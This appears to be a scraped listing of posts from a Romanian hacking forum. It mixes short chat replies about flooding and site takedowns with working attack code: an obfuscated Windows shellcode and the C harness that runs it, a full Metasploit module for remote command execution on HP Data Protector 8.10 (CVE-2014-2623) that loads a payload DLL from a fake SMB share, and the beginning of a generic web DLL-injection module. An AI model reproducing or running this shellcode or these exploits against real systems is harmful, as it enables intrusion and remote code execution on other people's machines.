$0x7878756c,%ecx 31: ba 4c 34 34 31 mov $0x3134344c,%edx 36: 31 d1 xor %edx,%ecx 38: 51 push %ecx 39: b9 46 47 57 46 mov $0x46574746,%ecx 3e: ba 33 34 32 34 mov $0x34323433,%edx 43: 31 d1 xor %edx,%ecx 45: 51 push %ecx 46: b9 56 50 47 64 mov $0x64475056,%ecx 4b: ba 38 35 33 44 mov $0x44333538,%edx 50: 31 d1 xor %edx,%ecx 52: 51 push %ecx 53: 89 e0 mov %esp,%eax 55: bb 41 41 41 01 mov $0x1414141,%ebx 5a: c1 eb 08 shr $0x8,%ebx 5d: c1 eb 08 shr $0x8,%ebx 60: c1 eb 08 shr $0x8,%ebx 63: 53 push %ebx 64: 50 push %eax 65: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx 6a: ba 33 52 64 59 mov $0x59645233,%edx 6f: 31 d3 xor %edx,%ebx 71: ff d3 call *%ebx 73: 31 c0 xor %eax,%eax 75: 50 push %eax 76: 68 41 41 64 64 push $0x64644141 7b: 58 pop %eax 7c: c1 e8 08 shr $0x8,%eax 7f: c1 e8 08 shr $0x8,%eax 82: 50 push %eax 83: b9 01 41 60 32 mov $0x32604101,%ecx 88: ba 48 61 4f 53 mov $0x534f6148,%edx 8d: 31 d1 xor %edx,%ecx 8f: 51 push %ecx 90: b9 28 47 0d 2f mov $0x2f0d4728,%ecx 95: ba 5b 67 4c 63 mov $0x634c675b,%edx 9a: 31 d1 xor %edx,%ecx 9c: 51 push %ecx 9d: b9 03 24 36 21 mov $0x21362403,%ecx a2: ba 62 50 59 53 mov $0x53595062,%edx a7: 31 d1 xor %edx,%ecx a9: 51 push %ecx aa: b9 34 41 15 18 mov $0x18154134,%ecx af: ba 5d 32 61 6a mov $0x6a61325d,%edx b4: 31 d1 xor %edx,%ecx b6: 51 push %ecx b7: b9 0c 05 1b 25 mov $0x251b050c,%ecx bc: ba 68 68 72 4b mov $0x4b726868,%edx c1: 31 d1 xor %edx,%ecx c3: 51 push %ecx c4: b9 2f 27 7b 13 mov $0x137b272f,%ecx c9: ba 5a 57 5b 52 mov $0x525b575a,%edx ce: 31 d1 xor %edx,%ecx d0: 51 push %ecx d1: b9 1c 2c 02 3e mov $0x3e022c1c,%ecx d6: ba 70 4b 70 51 mov $0x51704b70,%edx db: 31 d1 xor %edx,%ecx dd: 51 push %ecx de: b9 3d 2a 32 4c mov $0x4c322a3d,%ecx e3: ba 51 45 51 2d mov $0x2d514551,%edx e8: 31 d1 xor %edx,%ecx ea: 51 push %ecx eb: b9 23 5c 1c 19 mov $0x191c5c23,%ecx f0: ba 4d 39 68 39 mov $0x3968394d,%edx f5: 31 d1 xor %edx,%ecx f7: 51 push %ecx f8: 89 e0 mov %esp,%eax fa: bb 41 41 41 01 mov $0x1414141,%ebx ff: c1 eb 08 shr $0x8,%ebx 102: c1 eb 08 shr $0x8,%ebx 105: c1 eb 08 shr $0x8,%ebx 108: 53 push %ebx 109: 50 push %eax 10a: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx 10f: ba 33 52 64 59 mov $0x59645233,%edx 114: 31 d3 xor %edx,%ebx 116: ff d3 call *%ebx 118: 31 c0 xor %eax,%eax 11a: 50 push %eax 11b: 68 41 41 64 64 push $0x64644141 120: 58 pop %eax 121: c1 e8 08 shr $0x8,%eax 124: c1 e8 08 shr $0x8,%eax 127: 50 push %eax 128: b9 02 63 6b 35 mov $0x356b6302,%ecx 12d: ba 4b 43 44 54 mov $0x5444434b,%edx 132: 31 d1 xor %edx,%ecx 134: 51 push %ecx 135: b9 61 55 6c 3d mov $0x3d6c5561,%ecx 13a: ba 43 75 2d 71 mov $0x712d7543,%edx 13f: 31 d1 xor %edx,%ecx 141: 51 push %ecx 142: b9 27 3f 3b 1a mov $0x1a3b3f27,%ecx 147: ba 54 5a 49 69 mov $0x69495a54,%edx 14c: 31 d1 xor %edx,%ecx 14e: 51 push %ecx 14f: b9 25 34 12 67 mov $0x67123425,%ecx 154: ba 4a 44 32 32 mov $0x3232444a,%edx 159: 31 d1 xor %edx,%ecx 15b: 51 push %ecx 15c: b9 0b 02 1f 19 mov $0x191f020b,%ecx 161: ba 6e 71 74 6d mov $0x6d74716e,%edx 166: 31 d1 xor %edx,%ecx 168: 51 push %ecx 169: b9 39 3f 7b 15 mov $0x157b3f39,%ecx 16e: ba 4d 5a 5b 51 mov $0x515b5a4d,%edx 173: 31 d1 xor %edx,%ecx 175: 51 push %ecx 176: b9 35 15 03 2a mov $0x2a031535,%ecx 17b: ba 67 70 6e 45 mov $0x456e7067,%edx 180: 31 d1 xor %edx,%ecx 182: 51 push %ecx 183: b9 3a 17 75 46 mov $0x4675173a,%ecx 188: ba 6f 47 55 64 mov $0x6455476f,%edx 18d: 31 d1 xor %edx,%ecx 18f: 51 push %ecx 190: b9 26 35 0b 1e mov $0x1e0b3526,%ecx 195: ba 6a 72 59 51 mov $0x5159726a,%edx 19a: 31 d1 xor %edx,%ecx 19c: 51 push %ecx 19d: b9 2a 2a 06 2a mov $0x2a062a2a,%ecx 1a2: ba 66 65 45 6b mov $0x6b456566,%edx 1a7: 31 d1 xor %edx,%ecx 1a9: 51 push %ecx 1aa: b9 1d 20 35 5a mov $0x5a35201d,%ecx 1af: ba 53 65 61 7a mov $0x7a616553,%edx 1b4: 31 d1 xor %edx,%ecx 1b6: 51 push %ecx 1b7: 89 e0 mov %esp,%eax 1b9: bb 41 41 41 01 mov $0x1414141,%ebx 1be: c1 eb 08 shr $0x8,%ebx 1c1: c1 eb 08 shr $0x8,%ebx 1c4: c1 eb 08 shr $0x8,%ebx 1c7: 53 push %ebx 1c8: 50 push %eax 1c9: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx 1ce: ba 33 52 64 59 mov $0x59645233,%edx 1d3: 31 d3 xor %edx,%ebx 1d5: ff d3 call *%ebx 1d7: 31 c0 xor %eax,%eax 1d9: 50 push %eax 1da: b9 09 4c 7c 5e mov $0x5e7c4c09,%ecx 1df: ba 38 6c 53 38 mov $0x38536c38,%edx 1e4: 31 d1 xor %edx,%ecx 1e6: 51 push %ecx 1e7: b9 42 4d 39 14 mov $0x14394d42,%ecx 1ec: ba 62 62 5d 34 mov $0x345d6262,%edx 1f1: 31 d1 xor %edx,%ecx 1f3: 51 push %ecx 1f4: b9 7a 24 26 75 mov $0x7526247a,%ecx 1f9: ba 2d 6b 74 31 mov $0x31746b2d,%edx 1fe: 31 d1 xor %edx,%ecx 200: 51 push %ecx 201: b9 1d 30 15 28 mov $0x2815301d,%ecx 206: ba 58 77 4a 6c mov $0x6c4a7758,%edx 20b: 31 d1 xor %edx,%ecx 20d: 51 push %ecx 20e: b9 7c 2f 57 16 mov $0x16572f7c,%ecx 213: ba 53 5b 77 44 mov $0x44775b53,%edx 218: 31 d1 xor %edx,%ecx 21a: 51 push %ecx 21b: b9 42 25 2a 66 mov $0x662a2542,%ecx 220: ba 2d 4b 59 46 mov $0x46594b2d,%edx 225: 31 d1 xor %edx,%ecx 227: 51 push %ecx 228: b9 28 2f 0c 5a mov $0x5a0c2f28,%ecx 22d: ba 4d 4c 78 33 mov $0x33784c4d,%edx 232: 31 d1 xor %edx,%ecx 234: 51 push %ecx 235: b9 20 2b 26 26 mov $0x26262b20,%ecx 23a: ba 63 44 48 48 mov $0x48484463,%edx 23f: 31 d1 xor %edx,%ecx 241: 51 push %ecx 242: b9 08 2b 23 67 mov $0x67232b08,%ecx 247: ba 66 52 77 34 mov $0x34775266,%edx 24c: 31 d1 xor %edx,%ecx 24e: 51 push %ecx 24f: b9 49 1c 2e 48 mov $0x482e1c49,%ecx 254: ba 69 7a 6a 2d mov $0x2d6a7a69,%edx 259: 31 d1 xor %edx,%ecx 25b: 51 push %ecx 25c: b9 67 67 1d 37 mov $0x371d6767,%ecx 261: ba 45 47 32 41 mov $0x41324745,%edx 266: 31 d1 xor %edx,%ecx 268: 51 push %ecx 269: b9 03 33 0d 3b mov $0x3b0d3303,%ecx 26e: ba 71 45 68 49 mov $0x49684571,%edx 273: 31 d1 xor %edx,%ecx 275: 51 push %ecx 276: b9 39 6a 3c 2f mov $0x2f3c6a39,%ecx 27b: ba 55 4a 6f 4a mov $0x4a6f4a55,%edx 280: 31 d1 xor %edx,%ecx 282: 51 push %ecx 283: b9 37 44 1f 2e mov $0x2e1f4437,%ecx 288: ba 5a 2d 71 4f mov $0x4f712d5a,%edx 28d: 31 d1 xor %edx,%ecx 28f: 51 push %ecx 290: b9 34 23 23 3b mov $0x3b232334,%ecx 295: ba 68 77 46 49 mov $0x49467768,%edx 29a: 31 d1 xor %edx,%ecx 29c: 51 push %ecx 29d: b9 07 3a 0a 14 mov $0x140a3a07,%ecx 2a2: ba 73 48 65 78 mov $0x78654873,%edx 2a7: 31 d1 xor %edx,%ecx 2a9: 51 push %ecx 2aa: b9 14 2e 58 53 mov $0x53582e14,%ecx 2af: ba 48 6d 37 3d mov $0x3d376d48,%edx 2b4: 31 d1 xor %edx,%ecx 2b6: 51 push %ecx 2b7: b9 3e 3d 26 32 mov $0x32263d3e,%ecx 2bc: ba 52 6e 43 46 mov $0x46436e52,%edx 2c1: 31 d1 xor %edx,%ecx 2c3: 51 push %ecx 2c4: b9 33 3c 35 34 mov $0x34353c33,%ecx 2c9: ba 5d 48 47 5b mov $0x5b47485d,%edx 2ce: 31 d1 xor %edx,%ecx 2d0: 51 push %ecx 2d1: b9 36 0e 07 2b mov $0x2b070e36,%ecx 2d6: ba 58 7a 44 44 mov $0x44447a58,%edx 2db: 31 d1 xor %edx,%ecx 2dd: 51 push %ecx 2de: b9 3c 10 0a 37 mov $0x370a103c,%ecx 2e3: ba 49 62 78 52 mov $0x52786249,%edx 2e8: 31 d1 xor %edx,%ecx 2ea: 51 push %ecx 2eb: b9 24 7c 3b 36 mov $0x363b7c24,%ecx 2f0: ba 61 31 67 75 mov $0x75673161,%edx 2f5: 31 d1 xor %edx,%ecx 2f7: 51 push %ecx 2f8: b9 31 3d 3b 27 mov $0x273b3d31,%ecx 2fd: ba 62 64 68 73 mov $0x73686462,%edx 302: 31 d1 xor %edx,%ecx 304: 51 push %ecx 305: b9 7f 7d 3d 35 mov $0x353d7d7f,%ecx 30a: ba 36 33 78 69 mov $0x69783336,%edx 30f: 31 d1 xor %edx,%ecx 311: 51 push %ecx 312: b9 7c 13 0f 2f mov $0x2f0f137c,%ecx 317: ba 31 52 4c 67 mov $0x674c5231,%edx 31c: 31 d1 xor %edx,%ecx 31e: 51 push %ecx 31f: b9 1b 08 35 2d mov $0x2d35081b,%ecx 324: ba 58 49 79 72 mov $0x72794958,%edx 329: 31 d1 xor %edx,%ecx 32b: 51 push %ecx 32c: b9 74 3a 1e 21 mov $0x211e3a74,%ecx 331: ba 2d 65 52 6e mov $0x6e52652d,%edx 336: 31 d1 xor %edx,%ecx 338: 51 push %ecx 339: b9 16 10 1f 17 mov $0x171f1016,%ecx 33e: ba 34 58 54 52 mov $0x52545834,%edx 343: 31 d1 xor %edx,%ecx 345: 51 push %ecx 346: b9 2f 27 0c 6e mov $0x6e0c272f,%ecx 34b: ba 4e 43 68 4e mov $0x4e68434e,%edx 350: 31 d1 xor %edx,%ecx 352: 51 push %ecx 353: b9 39 22 5e 50 mov $0x505e2239,%ecx 358: ba 4b 47 39 70 mov $0x7039474b,%edx 35d: 31 d1 xor %edx,%ecx 35f: 51 push %ecx 360: 89 e0 mov %esp,%eax 362: bb 41 41 41 01 mov $0x1414141,%ebx 367: c1 eb 08 shr $0x8,%ebx 36a: c1 eb 08 shr $0x8,%ebx 36d: c1 eb 08 shr $0x8,%ebx 370: 53 push %ebx 371: 50 push %eax 372: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx 377: ba 33 52 64 59 mov $0x59645233,%edx 37c: 31 d3 xor %edx,%ebx 37e: ff d3 call *%ebx 380: 31 c0 xor %eax,%eax 382: 50 push %eax 383: b8 41 41 41 65 mov $0x65414141,%eax 388: c1 e8 08 shr $0x8,%eax 38b: c1 e8 08 shr $0x8,%eax 38e: c1 e8 08 shr $0x8,%eax 391: 50 push %eax 392: b9 1e 53 39 3c mov $0x3c39531e,%ecx 397: ba 6d 32 5b 50 mov $0x505b326d,%edx 39c: 31 d1 xor %edx,%ecx 39e: 51 push %ecx 39f: b9 04 66 2f 32 mov $0x322f6604,%ecx 3a4: ba 61 46 4b 5b mov $0x5b4b4661,%edx 3a9: 31 d1 xor %edx,%ecx 3ab: 51 push %ecx 3ac: b9 19 1e 0d 11 mov $0x110d1e19,%ecx 3b1: ba 69 73 62 75 mov $0x75627369,%edx 3b6: 31 d1 xor %edx,%ecx 3b8: 51 push %ecx 3b9: b9 20 41 47 36 mov $0x36474120,%ecx 3be: ba 45 35 67 59 mov $0x59673545,%edx 3c3: 31 d1 xor %edx,%ecx 3c5: 51 push %ecx 3c6: b9 2b 05 64 2a mov $0x2a64052b,%ecx 3cb: ba 47 69 44 59 mov $0x59446947,%edx 3d0: 31 d1 xor %edx,%ecx 3d2: 51 push %ecx 3d3: b9 10 3f 4f 22 mov $0x224f3f10,%ecx 3d8: ba 62 5a 38 43 mov $0x43385a62,%edx 3dd: 31 d1 xor %edx,%ecx 3df: 51 push %ecx 3e0: b9 2a 6f 2a 24 mov $0x242a6f2a,%ecx 3e5: ba 42 4f 4c 4d mov $0x4d4c4f42,%edx 3ea: 31 d1 xor %edx,%ecx 3ec: 51 push %ecx 3ed: b9 29 09 1e 5e mov $0x5e1e0929,%ecx 3f2: ba 47 6c 6a 2d mov $0x2d6a6c47,%edx 3f7: 31 d1 xor %edx,%ecx 3f9: 51 push %ecx 3fa: 89 e0 mov %esp,%eax 3fc: bb 41 41 41 01 mov $0x1414141,%ebx 401: c1 eb 08 shr $0x8,%ebx 404: c1 eb 08 shr $0x8,%ebx 407: c1 eb 08 shr $0x8,%ebx 40a: 53 push %ebx 40b: 50 push %eax 40c: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx 411: ba 33 52 64 59 mov $0x59645233,%edx 416: 31 d3 xor %edx,%ebx 418: ff d3 call *%ebx 41a: 31 c0 xor %eax,%eax 41c: 50 push %eax 41d: b8 41 41 41 6f mov $0x6f414141,%eax 422: c1 e8 08 shr $0x8,%eax 425: c1 e8 08 shr $0x8,%eax 428: c1 e8 08 shr $0x8,%eax 42b: 50 push %eax 42c: b9 72 2a 05 39 mov $0x39052a72,%ecx 431: ba 52 4b 70 4d mov $0x4d704b52,%edx 436: 31 d1 xor %edx,%ecx 438: 51 push %ecx 439: b9 54 3a 05 52 mov $0x52053a54,%ecx 43e: ba 35 48 71 6f mov $0x6f714835,%edx 443: 31 d1 xor %edx,%ecx 445: 51 push %ecx 446: b9 29 16 0a 47 mov $0x470a1629,%ecx 44b: ba 4c 36 79 33 mov $0x3379364c,%edx 450: 31 d1 xor %edx,%ecx 452: 51 push %ecx 453: b9 27 1b 5b 3e mov $0x3e5b1b27,%ecx 458: ba 55 6d 32 5d mov $0x5d326d55,%edx 45d: 31 d1 xor %edx,%ecx 45f: 51 push %ecx 460: b9 33 1a 3b 10 mov $0x103b1a33,%ecx 465: ba 41 77 48 75 mov $0x75487741,%edx 46a: 31 d1 xor %edx,%ecx 46c: 51 push %ecx 46d: b9 34 79 3a 12 mov $0x123a7934,%ecx 472: ba 53 59 4e 77 mov $0x774e5953,%edx 477: 31 d1 xor %edx,%ecx 479: 51 push %ecx 47a: b9 1d 5c 1e 28 mov $0x281e5c1d,%ecx 47f: ba 72 32 78 41 mov $0x41783272,%edx 484: 31 d1 xor %edx,%ecx 486: 51 push %ecx 487: b9 2a 4e 5a 28 mov $0x285a4e2a,%ecx 48c: ba 59 2d 7a 4b mov $0x4b7a2d59,%edx 491: 31 d1 xor %edx,%ecx 493: 51 push %ecx 494: 89 e0 mov %esp,%eax 496: bb 41 41 41 01 mov $0x1414141,%ebx 49b: c1 eb 08 shr $0x8,%ebx 49e: c1 eb 08 shr $0x8,%ebx 4a1: c1 eb 08 shr $0x8,%ebx 4a4: 53 push %ebx 4a5: 50 push %eax 4a6: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx 4ab: ba 33 52 64 59 mov $0x59645233,%edx 4b0: 31 d3 xor %edx,%ebx 4b2: ff d3 call *%ebx 4b4: bb f9 7e 5e 22 mov $0x225e7ef9,%ebx 4b9: ba 36 54 3d 54 mov $0x543d5436,%edx 4be: 31 d3 xor %edx,%ebx 4c0: ff d3 call *%ebx */ #include <stdio.h> #include <string.h> int main(){ unsigned char shellcode[]= "\x31\xc0\x50\xb8\x41\x41\x41\x64\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x6d\x76\x53\x52\xba\x4d\x59\x32\x36\x31\xd1\x51\xb9\x6e\x72\x61\x71\xba\x4e\x33\x2d\x38\x31\xd1\x51\xb9\x6c\x75\x78\x78\xba\x4c\x34\x34\x31\x31\xd1\x51\xb9\x46\x47\x57\x46\xba\x33\x34\x32\x34\x31\xd1\x51\xb9\x56\x50\x47\x64\xba\x38\x35\x33\x44\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x01\x41\x60\x32\xba\x48\x61\x4f\x53\x31\xd1\x51\xb9\x28\x47\x0d\x2f\xba\x5b\x67\x4c\x63\x31\xd1\x51\xb9\x03\x24\x36\x21\xba\x62\x50\x59\x53\x31\xd1\x51\xb9\x34\x41\x15\x18\xba\x5d\x32\x61\x6a\x31\xd1\x51\xb9\x0c\x05\x1b\x25\xba\x68\x68\x72\x4b\x31\xd1\x51\xb9\x2f\x27\x7b\x13\xba\x5a\x57\x5b\x52\x31\xd1\x51\xb9\x1c\x2c\x02\x3e\xba\x70\x4b\x70\x51\x31\xd1\x51\xb9\x3d\x2a\x32\x4c\xba\x51\x45\x51\x2d\x31\xd1\x51\xb9\x23\x5c\x1c\x19\xba\x4d\x39\x68\x39\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x02\x63\x6b\x35\xba\x4b\x43\x44\x54\x31\xd1\x51\xb9\x61\x55\x6c\x3d\xba\x43\x75\x2d\x71\x31\xd1\x51\xb9\x27\x3f\x3b\x1a\xba\x54\x5a\x49\x69\x31\xd1\x51\xb9\x25\x34\x12\x67\xba\x4a\x44\x32\x32\x31\xd1\x51\xb9\x0b\x02\x1f\x19\xba\x6e\x71\x74\x6d\x31\xd1\x51\xb9\x39\x3f\x7b\x15\xba\x4d\x5a\x5b\x51\x31\xd1\x51\xb9\x35\x15\x03\x2a\xba\x67\x70\x6e\x45\x31\xd1\x51\xb9\x3a\x17\x75\x46\xba\x6f\x47\x55\x64\x31\xd1\x51\xb9\x26\x35\x0b\x1e\xba\x6a\x72\x59\x51\x31\xd1\x51\xb9\x2a\x2a\x06\x2a\xba\x66\x65\x45\x6b\x31\xd1\x51\xb9\x1d\x20\x35\x5a\xba\x53\x65\x61\x7a\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\xb9\x09\x4c\x7c\x5e\xba\x38\x6c\x53\x38\x31\xd1\x51\xb9\x42\x4d\x39\x14\xba\x62\x62\x5d\x34\x31\xd1\x51\xb9\x7a\x24\x26\x75\xba\x2d\x6b\x74\x31\x31\xd1\x51\xb9\x1d\x30\x15\x28\xba\x58\x77\x4a\x6c\x31\xd1\x51\xb9\x7c\x2f\x57\x16\xba\x53\x5b\x77\x44\x31\xd1\x51\xb9\x42\x25\x2a\x66\xba\x2d\x4b\x59\x46\x31\xd1\x51\xb9\x28\x2f\x0c\x5a\xba\x4d\x4c\x78\x33\x31\xd1\x51\xb9\x20\x2b\x26\x26\xba\x63\x44\x48\x48\x31\xd1\x51\xb9\x08\x2b\x23\x67\xba\x66\x52\x77\x34\x31\xd1\x51\xb9\x49\x1c\x2e\x48\xba\x69\x7a\x6a\x2d\x31\xd1\x51\xb9\x67\x67\x1d\x37\xba\x45\x47\x32\x41\x31\xd1\x51\xb9\x03\x33\x0d\x3b\xba\x71\x45\x68\x49\x31\xd1\x51\xb9\x39\x6a\x3c\x2f\xba\x55\x4a\x6f\x4a\x31\xd1\x51\xb9\x37\x44\x1f\x2e\xba\x5a\x2d\x71\x4f\x31\xd1\x51\xb9\x34\x23\x23\x3b\xba\x68\x77\x46\x49\x31\xd1\x51\xb9\x07\x3a\x0a\x14\xba\x73\x48\x65\x78\x31\xd1\x51\xb9\x14\x2e\x58\x53\xba\x48\x6d\x37\x3d\x31\xd1\x51\xb9\x3e\x3d\x26\x32\xba\x52\x6e\x43\x46\x31\xd1\x51\xb9\x33\x3c\x35\x34\xba\x5d\x48\x47\x5b\x31\xd1\x51\xb9\x36\x0e\x07\x2b\xba\x58\x7a\x44\x44\x31\xd1\x51\xb9\x3c\x10\x0a\x37\xba\x49\x62\x78\x52\x31\xd1\x51\xb9\x24\x7c\x3b\x36\xba\x61\x31\x67\x75\x31\xd1\x51\xb9\x31\x3d\x3b\x27\xba\x62\x64\x68\x73\x31\xd1\x51\xb9\x7f\x7d\x3d\x35\xba\x36\x33\x78\x69\x31\xd1\x51\xb9\x7c\x13\x0f\x2f\xba\x31\x52\x4c\x67\x31\xd1\x51\xb9\x1b\x08\x35\x2d\xba\x58\x49\x79\x72\x31\xd1\x51\xb9\x74\x3a\x1e\x21\xba\x2d\x65\x52\x6e\x31\xd1\x51\xb9\x16\x10\x1f\x17\xba\x34\x58\x54\x52\x31\xd1\x51\xb9\x2f\x27\x0c\x6e\xba\x4e\x43\x68\x4e\x31\xd1\x51\xb9\x39\x22\x5e\x50\xba\x4b\x47\x39\x70\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x65\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x1e\x53\x39\x3c\xba\x6d\x32\x5b\x50\x31\xd1\x51\xb9\x04\x66\x2f\x32\xba\x61\x46\x4b\x5b\x31\xd1\x51\xb9\x19\x1e\x0d\x11\xba\x69\x73\x62\x75\x31\xd1\x51\xb9\x20\x41\x47\x36\xba\x45\x35\x67\x59\x31\xd1\x51\xb9\x2b\x05\x64\x2a\xba\x47\x69\x44\x59\x31\xd1\x51\xb9\x10\x3f\x4f\x22\xba\x62\x5a\x38\x43\x31\xd1\x51\xb9\x2a\x6f\x2a\x24\xba\x42\x4f\x4c\x4d\x31\xd1\x51\xb9\x29\x09\x1e\x5e\xba\x47\x6c\x6a\x2d\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x6f\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x72\x2a\x05\x39\xba\x52\x4b\x70\x4d\x31\xd1\x51\xb9\x54\x3a\x05\x52\xba\x35\x48\x71\x6f\x31\xd1\x51\xb9\x29\x16\x0a\x47\xba\x4c\x36\x79\x33\x31\xd1\x51\xb9\x27\x1b\x5b\x3e\xba\x55\x6d\x32\x5d\x31\xd1\x51\xb9\x33\x1a\x3b\x10\xba\x41\x77\x48\x75\x31\xd1\x51\xb9\x34\x79\x3a\x12\xba\x53\x59\x4e\x77\x31\xd1\x51\xb9\x1d\x5c\x1e\x28\xba\x72\x32\x78\x41\x31\xd1\x51\xb9\x2a\x4e\x5a\x28\xba\x59\x2d\x7a\x4b\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\xbb\xf9\x7e\x5e\x22\xba\x36\x54\x3d\x54\x31\xd3\xff\xd3"; fprintf(stdout,"Length: %d\n\n",strlen(shellcode)); (*(void(*)()) shellcode)(); }
  13. Iar ne trezim cu copii peste noapte care dau flood => prostie => dau de belele copii. In loc sa faci ceva care ar ajuta cu adevarat, tu le dai jucarii la copii. Probabil cineva de sus ne vrea prosti. Nu, nu mi-am luat flood. Bine ca nu te am in lista shadowe .
  14. Pune te rog restrictie pe domeniile .ro si ip-urile de Romania.
  15. Plm am uitat, nu fii asa frustrat ca nu te intrec la posturi. Doar vreau sa ajut si eu putin comunitatea.
  16. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::SMB::Server::Share include Msf::Exploit::EXE def initialize(info={}) super(update_info(info, 'Name' => 'HP Data Protector 8.10 Remote Command Execution', 'Description' => %q{ This module exploits a remote command execution on HP Data Protector 8.10. Arbitrary commands can be execute by sending crafted requests with opcode 28 to the OmniInet service listening on the TCP/5555 port. Since there is an strict length limitation on the command, rundll32.exe is executed, and the payload is provided through a DLL by a fake SMB server. This module has been tested successfully on HP Data Protector 8.1 on Windows 7 SP1. }, 'Author' => [ 'Christian Ramirez', # POC 'Henoch Barrera', # POC 'Matthew Hall <hallm[at]sec-1.com>' # Metasploit Module ], 'References' => [ ['CVE', '2014-2623'], ['OSVDB', '109069'], ['EDB', '34066'], ['URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818'] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, 'Privileged' => true, 'Platform' => 'win', 'Stance' => Msf::Exploit::Stance::Aggressive, 'Targets' => [ [ 'HP Data Protector 8.10 / Windows', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 02 2014')) register_options( [ Opt::RPORT(5555), OptString.new('FILE_NAME', [ false, 'DLL File name to share']), OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15]) ], self.class) deregister_options('FOLDER_NAME') deregister_options('FILE_CONTENTS') end def check fingerprint = get_fingerprint if fingerprint.nil? return Exploit::CheckCode::Unknown end print_status("#{peer} - HP Data Protector version #{fingerprint}") if fingerprint =~ /HP Data Protector A\.08\.(\d+)/ minor = $1.to_i else return Exploit::CheckCode::Safe end if minor < 11 return Exploit::CheckCode::Appears end Exploit::CheckCode::Detected end def peer "#{rhost}:#{rport}" end def get_fingerprint ommni = connect ommni.put(rand_text_alpha_upper(64)) resp = ommni.get_once(-1) disconnect if resp.nil? return nil end Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null end def send_pkt(cmd) cmd.gsub!("\\", "\\\\\\\\") pkt = "2\x00" pkt << "\x01\x01\x01\x01\x01\x01\x00" pkt << "\x01\x00" pkt << "\x01\x00" pkt << "\x01\x00" pkt << "\x01\x01\x00 " pkt << "28\x00" pkt << "\\perl.exe\x00 " pkt << "-esystem('#{cmd}')\x00" connect sock.put([pkt.length].pack('N') + pkt) disconnect end def primer self.file_contents = generate_payload_dll print_status("File available on #{unc}...") print_status("#{peer} - Trying to execute remote DLL...") sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}" send_pkt(sploit) end def setup super self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll" unless file_name =~ /\.dll$/ fail_with(Failure::BadConfig, "FILE_NAME must end with .dll") end end def exploit begin Timeout.timeout(datastore['SMB_DELAY']) {super} rescue Timeout::Error # do nothing... just finish exploit and stop smb server... end end end
  17. ce inseamna hacking pentru tine? on : bun venit
  18. Ce stii sa faci? lasa-mi in pm si te indrum eu.
  19. Tu crezi ca owneri acestui site nu au altceva mai bun de facut de cat sa-ti dea tie jos site-ul?
  20. This is a general-purpose module for exploiting conditions where a HTTP request triggers a DLL load from an specified SMB share. This Metasploit module serves payloads as DLLs over an SMB service and allows an arbitrary HTTP URL to be called that would trigger the load of the DLL. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::SMB::Server::Share include Msf::Exploit::EXE def initialize(info={}) super(update_info(info, 'Name' => 'Generic Web Application DLL Injection', 'Description' => %q{ This is a general-purpose module for exploiting conditions where a HTTP request triggers a DLL load from an specified SMB share. This module serves payloads as DLLs over an SMB service and allows an arbitrary HTTP URL to be called that would trigger the load of the DLL. }, 'Author' => [ 'Matthew Hall <hallm[at]sec-1.com>' ], 'Platform' => 'win', 'Privileged' => false, 'Arch' => [ARCH_X86, ARCH_X86_64], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, 'References' => [ ['CWE', '427'] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ [ 'Windows x86', { 'Arch' => ARCH_X86 } ], 